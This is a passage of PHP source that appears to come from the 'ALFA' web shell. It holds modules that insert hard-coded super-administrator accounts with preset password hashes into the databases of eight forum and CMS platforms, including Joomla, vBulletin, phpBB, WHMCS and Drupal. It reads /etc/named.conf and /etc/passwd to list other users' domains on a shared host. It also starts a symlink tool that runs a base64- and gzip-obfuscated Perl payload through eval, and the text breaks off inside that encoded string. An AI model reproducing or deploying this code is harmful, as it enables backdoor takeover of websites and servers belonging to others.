5129. 'inputSize' => '50'
5130. ) ,
5131. 'td3' => array(
5132. 'color' => 'FFFFFF',
5133. 'tdName' => 'Db User',
5134. 'id' => 'db_user',
5135. 'inputName' => 'username',
5136. 'inputValue' => '',
5137. 'inputSize' => '50'
5138. ) ,
5139. 'td4' => array(
5140. 'color' => 'FFFFFF',
5141. 'tdName' => 'Db Pass',
5142. 'id' => 'db_pw',
5143. 'inputName' => 'password',
5144. 'inputValue' => '',
5145. 'inputSize' => '50'
5146. ) ,
5147. 'td5' => array(
5148. 'color' => 'FFFFFF',
5149. 'tdName' => 'Table Prefix',
5150. 'id' => 'db_prefix',
5151. 'inputName' => 'prefix',
5152. 'inputValue' => 'jos_',
5153. 'inputSize' => '50'
5154. ) ,
5155. 'td6' => array(
5156. 'color' => 'FF0000',
5157. 'tdName' => 'Admin User',
5158. 'inputName' => 'admin',
5159. 'inputValue' => 'admin',
5160. 'inputSize' => '50'
5161. ) ,
5162. 'td7' => array(
5163. 'color' => 'FF0000',
5164. 'tdName' => 'Admin Pass',
5165. 'inputName' => 'toftof',
5166. 'inputValue' => 'solevisible',
5167. 'inputSize' => '50',
5168. 'disabled' => true
5169. ) ,
5170. 'td8' => array(
5171. 'color' => 'FF0000',
5172. 'tdName' => 'Admin Email',
5173. 'inputName' => 'email',
5174. 'inputValue' => 'solevisible@fbi.gov',
5175. 'inputSize' => '50'
5176. )
5177. );
5178. create_table($table);
5179. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
5180. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>')
5181. {
5182. $localhost = $_POST['alfa3'];
5183. $database = $_POST['alfa4'];
5184. $username = $_POST['alfa5'];
5185. $password = $_POST['alfa6'];
5186. $admin = $_POST['alfa8'];
5187. $SQL = $_POST['alfa9'];
5188. $prefix = $_POST['alfa10'];
5189. $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
5190. $solevisible = @mysqli_query($conn, "insert into " . $prefix . "users (id,name,username,email,password) values(null,'Super User','" . $admin . "','" . $SQL . "','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
5191. $solevisible = @mysqli_query($conn, "select id from " . $prefix . "users where username='" . $admin . "'") or die(mysqli_error($conn));
5192. $sole = @mysqli_num_rows($solevisible);
5193. if ($sole == 1)
5194. {
5195. $solevis = @mysqli_fetch_assoc($solevisible);
5196. $res = $solevis['id'];
5197. }
5198. $solevisible = @mysqli_query($conn, "INSERT INTO " . $prefix . "user_usergroup_map (user_id,group_id) VALUES ('" . $res . "', '8')") or die(mysqli_error($conn));
5199. if ($solevisible)
5200. {
5201. __alert('Success... ' . $admin . ' is created...');
5202. }
5203. }
5204. }
5205. if ($_POST['alfa4'] && $_POST['alfa4'] == 'vb')
5206. {
5207. echo __pre() . '<center><center><div class="txtfont_header">| vBulletin |<div><p>' . getConfigHtml('vb') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">';
5208. $table = array(
5209. 'td1' => array(
5210. 'color' => 'FFFFFF',
5211. 'tdName' => 'Mysql Host',
5212. 'id' => 'db_host',
5213. 'inputName' => 'localhost',
5214. 'inputValue' => 'localhost',
5215. 'inputSize' => '50'
5216. ) ,
5217. 'td2' => array(
5218. 'color' => 'FFFFFF',
5219. 'tdName' => 'Db Name',
5220. 'id' => 'db_name',
5221. 'inputName' => 'database',
5222. 'inputValue' => '',
5223. 'inputSize' => '50'
5224. ) ,
5225. 'td3' => array(
5226. 'color' => 'FFFFFF',
5227. 'tdName' => 'Db User',
5228. 'id' => 'db_user',
5229. 'inputName' => 'username',
5230. 'inputValue' => '',
5231. 'inputSize' => '50'
5232. ) ,
5233. 'td4' => array(
5234. 'color' => 'FFFFFF',
5235. 'tdName' => 'Db Pass',
5236. 'id' => 'db_pw',
5237. 'inputName' => 'password',
5238. 'inputValue' => '',
5239. 'inputSize' => '50'
5240. ) ,
5241. 'td5' => array(
5242. 'color' => 'FFFFFF',
5243. 'tdName' => 'Table Prefix',
5244. 'id' => 'db_prefix',
5245. 'inputName' => 'prefix',
5246. 'inputValue' => '',
5247. 'inputSize' => '50'
5248. ) ,
5249. 'td6' => array(
5250. 'color' => 'FF0000',
5251. 'tdName' => 'Admin User',
5252. 'inputName' => 'admin',
5253. 'inputValue' => 'admin',
5254. 'inputSize' => '50'
5255. ) ,
5256. 'td7' => array(
5257. 'color' => 'FF0000',
5258. 'tdName' => 'Admin Pass',
5259. 'inputName' => 'hi',
5260. 'inputValue' => 'solevisible',
5261. 'inputSize' => '50',
5262. 'disabled' => true
5263. ) ,
5264. 'td8' => array(
5265. 'color' => 'FF0000',
5266. 'tdName' => 'Admin Email',
5267. 'inputName' => 'email',
5268. 'inputValue' => 'solevisible@fbi.gov',
5269. 'inputSize' => '50'
5270. )
5271. );
5272. create_table($table);
5273. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
5274. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>')
5275. {
5276. $localhost = $_POST['alfa2'];
5277. $database = $_POST['alfa3'];
5278. $username = $_POST['alfa5'];
5279. $password = $_POST['alfa6'];
5280. $prefix = $_POST['alfa7'];
5281. $admin = $_POST['alfa8'];
5282. $SQL = $_POST['alfa9'];
5283. $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
5284. $solevisible = @mysqli_query($conn, "insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','$SQL','" . date('Y-m-d') . "','" . time() . "')") or die(mysqli_error($conn));
5285. $solevisible = @mysqli_query($conn, "select userid from {$prefix}user where username='" . $admin . "'") or die(mysqli_error($conn));
5286. $sole = mysqli_num_rows($solevisible);
5287. if ($sole == 1)
5288. {
5289. $solevis = mysqli_fetch_assoc($solevisible);
5290. $res = $solevis['userid'];
5291. }
5292. $solevisible = @mysqli_query($conn, "insert into {$prefix}administrator (userid,adminpermissions) values('" . $res . "','16744444')") or die(mysqli_error($conn));
5293. if ($solevisible)
5294. {
5295. __alert('Success... ' . $admin . ' is created...');
5296. }
5297. }
5298. }
5299. if (isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb')
5300. {
5301. echo __pre() . '<center><div class="txtfont_header">| phpBB |</div><p><p>' . getConfigHtml('phpbb') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
5302. $table = array(
5303. 'td1' => array(
5304. 'color' => 'FFFFFF',
5305. 'tdName' => 'Mysql Host',
5306. 'id' => 'db_host',
5307. 'inputName' => 'localhost',
5308. 'inputValue' => 'localhost',
5309. 'inputSize' => '50'
5310. ) ,
5311. 'td2' => array(
5312. 'color' => 'FFFFFF',
5313. 'tdName' => 'Db Name',
5314. 'id' => 'db_name',
5315. 'inputName' => 'database',
5316. 'inputValue' => '',
5317. 'inputSize' => '50'
5318. ) ,
5319. 'td3' => array(
5320. 'color' => 'FFFFFF',
5321. 'tdName' => 'Db User',
5322. 'id' => 'db_user',
5323. 'inputName' => 'username',
5324. 'inputValue' => '',
5325. 'inputSize' => '50'
5326. ) ,
5327. 'td4' => array(
5328. 'color' => 'FFFFFF',
5329. 'tdName' => 'Db Pass',
5330. 'id' => 'db_pw',
5331. 'inputName' => 'password',
5332. 'inputValue' => '',
5333. 'inputSize' => '50'
5334. ) ,
5335. 'td5' => array(
5336. 'color' => 'FFFFFF',
5337. 'tdName' => 'Table Prefix',
5338. 'id' => 'db_prefix',
5339. 'inputName' => 'prefix',
5340. 'inputValue' => '',
5341. 'inputSize' => '50'
5342. ) ,
5343. 'td6' => array(
5344. 'color' => 'FF0000',
5345. 'tdName' => 'Admin User',
5346. 'inputName' => 'admin',
5347. 'inputValue' => 'admin',
5348. 'inputSize' => '50'
5349. ) ,
5350. 'td7' => array(
5351. 'color' => 'FF0000',
5352. 'tdName' => 'Admin Pass',
5353. 'inputName' => 'toftof',
5354. 'inputValue' => 'solevisible',
5355. 'inputSize' => '50',
5356. 'disabled' => true
5357. ) ,
5358. 'td8' => array(
5359. 'color' => 'FF0000',
5360. 'tdName' => 'Admin Email',
5361. 'inputName' => 'email',
5362. 'inputValue' => 'solevisible@fbi.gov',
5363. 'inputSize' => '50'
5364. )
5365. );
5366. create_table($table);
5367. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
5368. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>')
5369. {
5370. $localhost = $_POST['alfa2'];
5371. $database = $_POST['alfa3'];
5372. $username = $_POST['alfa4'];
5373. $password = $_POST['alfa6'];
5374. $admin = $_POST['alfa8'];
5375. $SQL = $_POST['alfa9'];
5376. $prefix = $_POST['alfa10'];
5377. $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
5378. $hash = md5('solevisible');
5379. $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET username_clean ='" . $admin . "' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
5380. $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET user_password ='" . $hash . "' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
5381. $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET username_clean ='" . $admin . "' WHERE user_type = 3") or die(mysqli_error($conn));
5382. $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET user_password ='" . $hash . "' WHERE user_type = 3") or die(mysqli_error($conn));
5383. $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET user_email ='" . $SQL . "' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
5384. if ($solevisible)
5385. {
5386. __alert('Success... ' . $admin . ' is created...');
5387. }
5388. }
5389. }
5390. if (isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs')
5391. {
5392. echo __pre() . '<center><div class="txtfont_header">| Whmcs |</div><p><p>' . getConfigHtml('whmcs') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value); return false;" method="POST">';
5393. $table = array(
5394. 'td1' => array(
5395. 'color' => 'FFFFFF',
5396. 'tdName' => 'Mysql Host',
5397. 'id' => 'db_host',
5398. 'inputName' => 'localhost',
5399. 'inputValue' => 'localhost',
5400. 'inputSize' => '50'
5401. ) ,
5402. 'td2' => array(
5403. 'color' => 'FFFFFF',
5404. 'tdName' => 'Db Name',
5405. 'id' => 'db_name',
5406. 'inputName' => 'database',
5407. 'inputValue' => '',
5408. 'inputSize' => '50'
5409. ) ,
5410. 'td3' => array(
5411. 'color' => 'FFFFFF',
5412. 'tdName' => 'Db User',
5413. 'id' => 'db_user',
5414. 'inputName' => 'username',
5415. 'inputValue' => '',
5416. 'inputSize' => '50'
5417. ) ,
5418. 'td4' => array(
5419. 'color' => 'FFFFFF',
5420. 'tdName' => 'Db Pass',
5421. 'id' => 'db_pw',
5422. 'inputName' => 'password',
5423. 'inputValue' => '',
5424. 'inputSize' => '50'
5425. ) ,
5426. 'td6' => array(
5427. 'color' => 'FF0000',
5428. 'tdName' => 'Admin User',
5429. 'inputName' => 'admin',
5430. 'inputValue' => 'admin',
5431. 'inputSize' => '50'
5432. ) ,
5433. 'td7' => array(
5434. 'color' => 'FF0000',
5435. 'tdName' => 'Admin Pass',
5436. 'inputName' => 'toftof',
5437. 'inputValue' => 'solevisible',
5438. 'inputSize' => '50',
5439. 'disabled' => true
5440. ) ,
5441. 'td8' => array(
5442. 'color' => 'FF0000',
5443. 'tdName' => 'Admin Email',
5444. 'inputName' => 'email',
5445. 'inputValue' => 'solevisible@fbi.gov',
5446. 'inputSize' => '50'
5447. )
5448. );
5449. create_table($table);
5450. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
5451. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>')
5452. {
5453. $localhost = $_POST['alfa2'];
5454. $database = $_POST['alfa3'];
5455. $username = $_POST['alfa4'];
5456. $password = $_POST['alfa5'];
5457. $admin = $_POST['alfa8'];
5458. $SQL = $_POST['alfa9'];
5459. $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
5460. $solevisible = @mysqli_query($conn, "insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','" . $admin . "','d4a590caacc0be55ef286e40a945ea45','" . $SQL . "','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
5461. if ($solevisible)
5462. {
5463. __alert('Success... ' . $admin . ' is created...');
5464. }
5465. }
5466. }
5467. if (isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb')
5468. {
5469. echo __pre() . '<center><div class="txtfont_header">| Mybb |</div><p><p>' . getConfigHtml('mybb') . '</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
5470. $table = array(
5471. 'td1' => array(
5472. 'color' => 'FFFFFF',
5473. 'tdName' => 'Mysql Host',
5474. 'id' => 'db_host',
5475. 'inputName' => 'localhost',
5476. 'inputValue' => 'localhost',
5477. 'inputSize' => '50'
5478. ) ,
5479. 'td2' => array(
5480. 'color' => 'FFFFFF',
5481. 'tdName' => 'Db Name',
5482. 'id' => 'db_name',
5483. 'inputName' => 'database',
5484. 'inputValue' => '',
5485. 'inputSize' => '50'
5486. ) ,
5487. 'td3' => array(
5488. 'color' => 'FFFFFF',
5489. 'tdName' => 'Db User',
5490. 'id' => 'db_user',
5491. 'inputName' => 'username',
5492. 'inputValue' => '',
5493. 'inputSize' => '50'
5494. ) ,
5495. 'td4' => array(
5496. 'color' => 'FFFFFF',
5497. 'tdName' => 'Db Pass',
5498. 'id' => 'db_pw',
5499. 'inputName' => 'password',
5500. 'inputValue' => '',
5501. 'inputSize' => '50'
5502. ) ,
5503. 'td5' => array(
5504. 'color' => 'FFFFFF',
5505. 'tdName' => 'Table Prefix',
5506. 'id' => 'db_prefix',
5507. 'inputName' => 'prefix',
5508. 'inputValue' => '',
5509. 'inputSize' => '50'
5510. ) ,
5511. 'td6' => array(
5512. 'color' => 'FF0000',
5513. 'tdName' => 'Admin User',
5514. 'inputName' => 'admin',
5515. 'inputValue' => 'admin',
5516. 'inputSize' => '50'
5517. ) ,
5518. 'td7' => array(
5519. 'color' => 'FF0000',
5520. 'tdName' => 'Admin Pass',
5521. 'inputName' => 'toftof',
5522. 'inputValue' => 'solevisible',
5523. 'inputSize' => '50',
5524. 'disabled' => true
5525. ) ,
5526. 'td8' => array(
5527. 'color' => 'FF0000',
5528. 'tdName' => 'Admin Email',
5529. 'inputName' => 'email',
5530. 'inputValue' => 'solevisible@fbi.gov',
5531. 'inputSize' => '50'
5532. )
5533. );
5534. create_table($table);
5535. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
5536. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>')
5537. {
5538. $localhost = $_POST['alfa2'];
5539. $database = $_POST['alfa3'];
5540. $username = $_POST['alfa4'];
5541. $password = $_POST['alfa5'];
5542. $admin = $_POST['alfa8'];
5543. $SQL = $_POST['alfa9'];
5544. $prefix = $_POST['alfa10'];
5545. $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
5546. $solevisible = @mysqli_query($conn, "insert into " . $prefix . "users (uid,username,password,salt,email,usergroup) values(null,'" . $admin . "','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','" . $SQL . "','4')") or die(mysqli_error($conn));
5547. if ($solevisible)
5548. {
5549. __alert('Success... ' . $admin . ' is created...');
5550. }
5551. }
5552. }
5553. if (isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke')
5554. {
5555. echo __pre() . '<center><div class="txtfont_header">| PhpNuke |</div><p><p>' . getConfigHtml('phpnuke') . '</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value); return false;" method="POST">';
5556. $table = array(
5557. 'td1' => array(
5558. 'color' => 'FFFFFF',
5559. 'tdName' => 'Mysql Host',
5560. 'id' => 'db_host',
5561. 'inputName' => 'localhost',
5562. 'inputValue' => 'localhost',
5563. 'inputSize' => '50'
5564. ) ,
5565. 'td2' => array(
5566. 'color' => 'FFFFFF',
5567. 'tdName' => 'Db Name',
5568. 'id' => 'db_name',
5569. 'inputName' => 'database',
5570. 'inputValue' => '',
5571. 'inputSize' => '50'
5572. ) ,
5573. 'td3' => array(
5574. 'color' => 'FFFFFF',
5575. 'tdName' => 'Db User',
5576. 'id' => 'db_user',
5577. 'inputName' => 'username',
5578. 'inputValue' => '',
5579. 'inputSize' => '50'
5580. ) ,
5581. 'td4' => array(
5582. 'color' => 'FFFFFF',
5583. 'tdName' => 'Db Pass',
5584. 'id' => 'db_pw',
5585. 'inputName' => 'password',
5586. 'inputValue' => '',
5587. 'inputSize' => '50'
5588. ) ,
5589. 'td5' => array(
5590. 'color' => 'FFFFFF',
5591. 'tdName' => 'Table Prefix',
5592. 'id' => 'db_prefix',
5593. 'inputName' => 'prefix',
5594. 'inputValue' => '',
5595. 'inputSize' => '50'
5596. ) ,
5597. 'td6' => array(
5598. 'color' => 'FF0000',
5599. 'tdName' => 'Admin User',
5600. 'inputName' => 'admin',
5601. 'inputValue' => 'admin',
5602. 'inputSize' => '50'
5603. ) ,
5604. 'td7' => array(
5605. 'color' => 'FF0000',
5606. 'tdName' => 'Admin Pass',
5607. 'inputName' => 'toftof',
5608. 'inputValue' => 'solevisible',
5609. 'inputSize' => '50',
5610. 'disabled' => true
5611. ) ,
5612. 'td8' => array(
5613. 'color' => 'FF0000',
5614. 'tdName' => 'Admin Email',
5615. 'inputName' => 'email',
5616. 'inputValue' => 'solevisible@fbi.gov',
5617. 'inputSize' => '50'
5618. )
5619. );
5620. create_table($table);
5621. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
5622. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>')
5623. {
5624. $localhost = $_POST['alfa2'];
5625. $database = $_POST['alfa3'];
5626. $username = $_POST['alfa4'];
5627. $password = $_POST['alfa5'];
5628. $admin = $_POST['alfa7'];
5629. $SQL = $_POST['alfa9'];
5630. $prefix = $_POST['alfa10'];
5631. $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
5632. $hash = md5($pwd);
5633. $solevisible = @mysqli_query($conn, "insert into " . $prefix . "_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
5634. if ($solevisible)
5635. {
5636. __alert('Success... ' . $admin . ' is created...');
5637. }
5638. }
5639. }
5640. if (isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal')
5641. {
5642. echo __pre() . '<center><div class="txtfont_header">| Drupal |</div><p><p>' . getConfigHtml('drupal') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\'); return false;" method="POST">';
5643. $table = array(
5644. 'td1' => array(
5645. 'color' => 'FFFFFF',
5646. 'tdName' => 'Mysql Host',
5647. 'id' => 'db_host',
5648. 'inputName' => 'localhost',
5649. 'inputValue' => 'localhost',
5650. 'inputSize' => '50'
5651. ) ,
5652. 'td2' => array(
5653. 'color' => 'FFFFFF',
5654. 'tdName' => 'Db Name',
5655. 'id' => 'db_name',
5656. 'inputName' => 'database',
5657. 'inputValue' => '',
5658. 'inputSize' => '50'
5659. ) ,
5660. 'td3' => array(
5661. 'color' => 'FFFFFF',
5662. 'tdName' => 'Db User',
5663. 'id' => 'db_user',
5664. 'inputName' => 'username',
5665. 'inputValue' => '',
5666. 'inputSize' => '50'
5667. ) ,
5668. 'td4' => array(
5669. 'color' => 'FFFFFF',
5670. 'tdName' => 'Db Pass',
5671. 'id' => 'db_pw',
5672. 'inputName' => 'password',
5673. 'inputValue' => '',
5674. 'inputSize' => '50'
5675. ) ,
5676. 'td6' => array(
5677. 'color' => 'FF0000',
5678. 'tdName' => 'Admin User',
5679. 'inputName' => 'admin',
5680. 'inputValue' => 'admin',
5681. 'inputSize' => '50'
5682. ) ,
5683. 'td7' => array(
5684. 'color' => 'FF0000',
5685. 'tdName' => 'Admin Pass',
5686. 'inputName' => 'toftof',
5687. 'inputValue' => 'solevisible',
5688. 'inputSize' => '50',
5689. 'disabled' => true
5690. )
5691. );
5692. create_table($table);
5693. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
5694. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>')
5695. {
5696. $localhost = $_POST['alfa2'];
5697. $database = $_POST['alfa4'];
5698. $username = $_POST['alfa5'];
5699. $password = $_POST['alfa6'];
5700. $admin = $_POST['alfa8'];
5701. $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
5702. $getDescuid = @mysqli_query($conn, "select uid from users order by uid desc limit 0,1");
5703. $getDescuid = @mysqli_fetch_assoc($getDescuid);
5704. $getDescuid = $getDescuid['uid'];
5705. $getdescuid = $getDescuid++;
5706. $solevisible = @mysqli_query($conn, "insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
5707. $solevisible = @mysqli_query($conn, "select uid from users where name='" . $admin . "'") or die(mysqli_error($conn));
5708. $sole = mysqli_num_rows($solevisible);
5709. if ($sole == 1)
5710. {
5711. $solevis = mysqli_fetch_assoc($solevisible);
5712. $res = $solevis['uid'];
5713. }
5714. $solevisible = @mysqli_query($conn, "INSERT INTO users_roles (uid,rid) VALUES ('" . $res . "', '3')") or die(mysqli_error($conn));
5715. if ($solevisible)
5716. {
5717. __alert('Success... ' . $admin . ' is created...');
5718. }
5719. }
5720. }
5721. if (isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf')
5722. {
5723. echo __pre() . '<center><center><div class="txtfont_header">| SMF |</div><p><p>' . getConfigHtml('smf') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\'); return false;" method="POST">';
5724. $table = array(
5725. 'td1' => array(
5726. 'color' => 'FFFFFF',
5727. 'tdName' => 'Mysql Host',
5728. 'id' => 'db_host',
5729. 'inputName' => 'localhost',
5730. 'inputValue' => 'localhost',
5731. 'inputSize' => '50'
5732. ) ,
5733. 'td2' => array(
5734. 'color' => 'FFFFFF',
5735. 'tdName' => 'Db Name',
5736. 'id' => 'db_name',
5737. 'inputName' => 'database',
5738. 'inputValue' => '',
5739. 'inputSize' => '50'
5740. ) ,
5741. 'td3' => array(
5742. 'color' => 'FFFFFF',
5743. 'tdName' => 'Db User',
5744. 'id' => 'db_user',
5745. 'inputName' => 'username',
5746. 'inputValue' => '',
5747. 'inputSize' => '50'
5748. ) ,
5749. 'td4' => array(
5750. 'color' => 'FFFFFF',
5751. 'tdName' => 'Db Pass',
5752. 'id' => 'db_pw',
5753. 'inputName' => 'password',
5754. 'inputValue' => '',
5755. 'inputSize' => '50'
5756. ) ,
5757. 'td5' => array(
5758. 'color' => 'FFFFFF',
5759. 'tdName' => 'Table Prefix',
5760. 'id' => 'db_prefix',
5761. 'inputName' => 'prefix',
5762. 'inputValue' => 'smf_',
5763. 'inputSize' => '50'
5764. ) ,
5765. 'td6' => array(
5766. 'color' => 'FF0000',
5767. 'tdName' => 'Admin User',
5768. 'inputName' => 'admin',
5769. 'inputValue' => 'admin',
5770. 'inputSize' => '50'
5771. ) ,
5772. 'td7' => array(
5773. 'color' => 'FF0000',
5774. 'tdName' => 'Admin Pass',
5775. 'inputName' => 'hi',
5776. 'inputValue' => 'solevisible',
5777. 'inputSize' => '50',
5778. 'disabled' => true
5779. ) ,
5780. );
5781. create_table($table);
5782. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
5783. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>')
5784. {
5785. $localhost = $_POST['alfa2'];
5786. $database = $_POST['alfa3'];
5787. $username = $_POST['alfa5'];
5788. $password = $_POST['alfa6'];
5789. $prefix = $_POST['alfa7'];
5790. $admin = $_POST['alfa8'];
5791. $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
5792. $setpwAlg = sha1(strtolower($admin) . 'solevisible');
5793. $solevisible = @mysqli_query($conn, "insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','solevisible@fbi.gov')") or die(mysqli_error($conn));
5794. if ($solevisible)
5795. {
5796. __alert('Success... ' . $admin . ' is created...');
5797. }
5798. }
5799. }
5800. echo "</div>";
5801. alfafooter();
5802. }
5803. function alfaMakePwd()
5804. {
5805. if (_alfa_file_exists("/etc/virtual/domainowners") || (_alfa_file_exists("/etc/named.conf") && _alfa_file_exists("/etc/valiases")))
5806. {
5807. return "/home/{user}/public_html/";
5808. }
5809. $document = explode("/", $_SERVER["DOCUMENT_ROOT"]);
5810. $public = end($document);
5811. array_pop($document);
5812. array_pop($document);
5813. $path = implode("/", $document) . "/{user}/" . $public;
5814. return $path;
5815. }
5816. function alfaGetDomains($state = false)
5817. {
5818. $state = "named.conf";
5819. $lines = array();
5820. $lines = _alfa_file('/etc/named.conf');
5821. if (!$lines)
5822. {
5823. $lines = @scandir("/etc/valiases/");
5824. $state = "valiases";
5825. if (!$lines)
5826. {
5827. $lines = @scandir("/var/named");
5828. $state = "named";
5829. if (!$lines && $state)
5830. {
5831. $lines = _alfa_file('/etc/passwd');
5832. $state = "passwd";
5833. }
5834. }
5835. }
5836. return array(
5837. "lines" => $lines,
5838. "state" => $state
5839. );
5840. }
5841. function alfasymlink()
5842. {
5843. alfahead();
5844. echo '<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symphp\')">| Symlink( php ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symperl\')">| Symlink( perl ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'sympy\')">| Symlink( python ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,\'SymFile\')">| File Symlink | </a></h3></center>';
5845. if (isset($_POST['alfa2']) && ($_POST['alfa2'] == 'symperl' || $_POST["alfa2"] == "sympy"))
5846. {
5847. $sympath = alfaMakePwd();
5848. @mkdir('cgialfa', 0755);
5849. @chdir('cgialfa');
5850. alfacgihtaccess('cgi');
5851. $perl = '#!/usr/bin/perl -I/usr/local/bandmin' . "\n" . 'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("H4sIAAAAAAAA/50YC1PaSPivbFOuSVrJg2q1BFDOas+Ztt5U25sb8ZhNdoHUkOSyC0KR/vb79pEYFW3nMmPYzX7v9zpjFEVZyjhOOTo5Gx6+P0HdHqKLmHGGGkefvq7M9/3zo7/6fw9PPp0ffT7uHx6Z62C6RI15y0ddZBhqE6p1PEKWomOjVV7EQNY4zFJOU97ky5y2EacL7k74NBmkg7QjFr3OhGLS6/CYJ7R3mBFKULhE/Q/HfXRO+x87rjrpML6EH7wSJJqERlmBeZyl7TRLabDuuOq84ypyYUaWKBxHWZIVXfO5Jx+zZwRKLLND4jmSKF0jx4TE6bjte/kiCKa4GMdpM8w4z6bqW5gVhBZtP18ggtkEJHw+kk8g6bdhJ8gHUjScxOO0HYHOtAhGoH3zmsbjCW+HWULUBxZ/p+3WG6Bs3GrMsoQihgl6geJ0HrM4hP0PdLacJnF6hX5foj9pkXRcELxnBmuaMLrSbmj0P7//euFdBtoT0TjGyQi7RrBmsxDIDXFR4CVagbMswPG2GnPfswH0YCgc+NvcH8FminO0agxFDPhrdCAAg4LyWZEiSwUFIPujlUBe2/a+3/YUg/yalLTfaKrxyHqmQ2GlaQhhgzUcABSi/yKDxAWNuFEBGO4km1J3NWO0WLv5LEziaChiRCgCeE0KIJRHboqnlDgQuiMDvXiBmkR/n4PtMaPM/UWaByxPYg4Cy1/LHbjulop7493p4ZePR5/Oh59PT8+Nta3ifBdg8yxHCjGoLTW7b1mcWoZrbOnvtgMSaOYGcoCCstgUX1FelEbbBq5zKl7+nnjvaCPqFOoApApV82GEmZA6EO8irlAZ7cfweD5EOzDcdoyOK04hNQQgJxtoJXTEBSWMJgUddU3DAamodNLFvnguDbSPzG94jllUxDlv44QW3DKuoYKI6jGKU4JINsVx6jiOYZttZE44z9uua4IQ1HYME3HILMq75jBMcHpl3hPa8/qtlqeEpjWhcSX4Bi2PjxWCv/dAzbo2kBeOIVKCqWxyxTqHdHL4govjHcdwfyYg2FTWEJ2RDwR0edHTGUeyIXC6nxMyhPzXIoauifwuPh3M/R34ZOlNVFu/rtaNOYG1r0nA0lPLt7dL73bpK4haqsmMgaxQx4KH/hRkOYX0Jp5wHdtC5r0EM22UFRVOmWBGoKXuaMReECUZtBO9VawBR/CukEr2QmjzbsKaUg4oCEg1l9aWAlS8d6XummVBRbkuJNSdc8Vz9y6XOS6UNk9z8H/CwS85PBMbe6WcAOUMHqjEm4raRsPO